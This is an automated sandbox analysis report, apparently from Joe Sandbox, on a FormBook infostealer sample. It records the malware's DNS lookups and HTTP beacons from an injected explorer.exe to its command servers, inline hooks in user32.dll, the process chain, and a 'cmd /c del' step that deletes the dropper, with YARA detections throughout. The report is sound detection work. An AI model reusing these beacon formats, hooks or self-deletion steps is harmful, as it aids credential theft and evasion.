              May 27, 2022 15:57:03.806201935 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.008594990 CEST8049759154.221.90.236192.168.2.3
              May 27, 2022 15:57:04.008848906 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.008946896 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.208508015 CEST8049759154.221.90.236192.168.2.3
              May 27, 2022 15:57:04.208559990 CEST8049759154.221.90.236192.168.2.3
              May 27, 2022 15:57:04.208586931 CEST8049759154.221.90.236192.168.2.3
              May 27, 2022 15:57:04.208679914 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.208717108 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.208798885 CEST4975980192.168.2.3154.221.90.236
              May 27, 2022 15:57:04.402236938 CEST8049759154.221.90.236192.168.2.3
              May 27, 2022 15:57:26.550544977 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:26.577750921 CEST804977535.204.150.5192.168.2.3
              May 27, 2022 15:57:26.577975035 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:26.578011036 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:26.608874083 CEST804977535.204.150.5192.168.2.3
              May 27, 2022 15:57:26.608958960 CEST804977535.204.150.5192.168.2.3
              May 27, 2022 15:57:26.609195948 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:26.609256983 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:27.062586069 CEST4977580192.168.2.335.204.150.5
              May 27, 2022 15:57:27.089837074 CEST804977535.204.150.5192.168.2.3

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 27, 2022 15:57:03.630029917 CEST5380253192.168.2.38.8.8.8
              May 27, 2022 15:57:03.800199986 CEST53538028.8.8.8192.168.2.3
              May 27, 2022 15:57:26.475037098 CEST6314653192.168.2.38.8.8.8
              May 27, 2022 15:57:26.549473047 CEST53631468.8.8.8192.168.2.3

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 27, 2022 15:57:03.630029917 CEST192.168.2.38.8.8.80x4c53Standard query (0)www.nzyyen.comA (IP address)IN (0x0001)
              May 27, 2022 15:57:26.475037098 CEST192.168.2.38.8.8.80x5b41Standard query (0)www.higginsuotdoors.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 27, 2022 15:57:03.800199986 CEST8.8.8.8192.168.2.30x4c53No error (0)www.nzyyen.com154.221.90.236A (IP address)IN (0x0001)
              May 27, 2022 15:57:26.549473047 CEST8.8.8.8192.168.2.30x5b41No error (0)www.higginsuotdoors.comwebsite-rendering.webador.comCNAME (Canonical name)IN (0x0001)
              May 27, 2022 15:57:26.549473047 CEST8.8.8.8192.168.2.30x5b41No error (0)website-rendering.webador.comwebsite-rendering.jouwweb.nlCNAME (Canonical name)IN (0x0001)
              May 27, 2022 15:57:26.549473047 CEST8.8.8.8192.168.2.30x5b41No error (0)website-rendering.jouwweb.nl35.204.150.5A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • www.nzyyen.com
              • www.higginsuotdoors.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349759154.221.90.23680C:\Windows\explorer.exe
              TimestampkBytes transferredDirectionData
              May 27, 2022 15:57:04.008946896 CEST8284OUTGET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1
              Host: www.nzyyen.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
              May 27, 2022 15:57:04.208508015 CEST8285INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 27 May 2022 13:57:03 GMT
              Content-Type: text/html
              Content-Length: 1946
              Connection: close
              Vary: Accept-Encoding
              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba a3 b0 b2 c1 c3 ce c2 cd a8 d1 b6 b9 c9 b7 dd d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 30 31 33 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 34 34 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 32 39 30 39 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 33 31 30 33 38 3b 26 23 32 31 33 30 36 3b 26 23 33 31 30 37 30 3b 26 23 33 39 35 33 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 38 37 3b 26 23 38 37 3b 26 23 38 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 32 39 30 39 3b 26 23 33 30 30 30 37 3b 26 23 32 30 31 35 34 3b 26 23 33 31 30 33 38 3b 26 23 32 31 33 30 36 3b 26 23 33 31 30 37 30 3b 26 23 33 39 35 33 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 38 37 3b 26 23 38 37 3b 26 23 38 37 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 30 31 33 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 34 34 39 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 30 30 30 37 3b 26 23 33 30 30 30 37 3b 26 23 37 31 3b 26 23 36 35 3b 26 23 38 39 3b 26 23 33 32 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 33 33 32 35 38 3b 26 23 32 34 39 34 34 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 34 33 31 3b 26 23 33 32 39 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36
              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#65;&#86;&#20135;&#22312;&#32447;&#31934;&#21697;&#20122;&#27954;&#31532;&#19968;&#31449;,&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#35266;&#30475;,&#22909;&#30007;&#20154;&#31038;&#21306;&#31070;&#39532;&#22312;&#32447;&#35266;&#30475;&#87;&#87;&#87;</title><meta name="keywords" content="&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#35266;&#30475;,&#22909;&#30007;&#20154;&#31038;&#21306;&#31070;&#39532;&#22312;&#32447;&#35266;&#30475;&#87;&#87;&#87;,&#20122;&#27954;&#65;&#86;&#20135;&#22312;&#32447;&#31934;&#21697;&#20122;&#27954;&#31532;&#19968;&#31449;" /><meta name="description" content="&#20122;&#27954;&#30007;&#30007;&#71;&#65;&#89;&#32;&#49;&#56;&#33258;&#24944;&#32593;&#31449;,&#32431;&#32905;&#26080;&#30721;&#72;&#32905;&#21160;&#28459;&#22312;&#32447;&#3526


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.34977535.204.150.580C:\Windows\explorer.exe
              TimestampkBytes transferredDirectionData
              May 27, 2022 15:57:26.578011036 CEST10348OUTGET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1
              Host: www.higginsuotdoors.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
              May 27, 2022 15:57:26.608874083 CEST10349INHTTP/1.1 301 Moved Permanently
              content-length: 0
              location: https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ
              connection: close


              Code Manipulations

              User Modules

              Hook Summary

              Function NameHook TypeActive in Processes
              PeekMessageAINLINEexplorer.exe
              PeekMessageWINLINEexplorer.exe
              GetMessageWINLINEexplorer.exe
              GetMessageAINLINEexplorer.exe

              Processes

              Process: explorer.exe, Module: user32.dll
              Function NameHook TypeNew Data
              PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEB
              PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEB
              GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEB
              GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEB

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:15:55:22
              Start date:27/05/2022
              Path:C:\Users\user\Desktop\lamsddre43321.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\lamsddre43321.exe"
              Imagebase:0x400000
              File size:278417 bytes
              MD5 hash:B1FCF52DEB6F04EF0F898C9938F26920
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:15:55:23
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\rlpjf.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
              Imagebase:0x1a0000
              File size:134144 bytes
              MD5 hash:FB06AEE14DBF93907437AB4372B1BBDE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Antivirus matches:
              • Detection: 37%, ReversingLabs
              Reputation:low

              General

              Target ID:2
              Start time:15:55:25
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\rlpjf.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
              Imagebase:0x1a0000
              File size:134144 bytes
              MD5 hash:FB06AEE14DBF93907437AB4372B1BBDE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              General

              Target ID:3
              Start time:15:55:31
              Start date:27/05/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff6b8cf0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              General

              Target ID:15
              Start time:15:56:18
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\msiexec.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\msiexec.exe
              Imagebase:0xfd0000
              File size:59904 bytes
              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              General

              Target ID:16
              Start time:15:56:21
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
              Imagebase:0xc20000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:17
              Start time:15:56:22
              Start date:27/05/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7c9170000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              No disassembly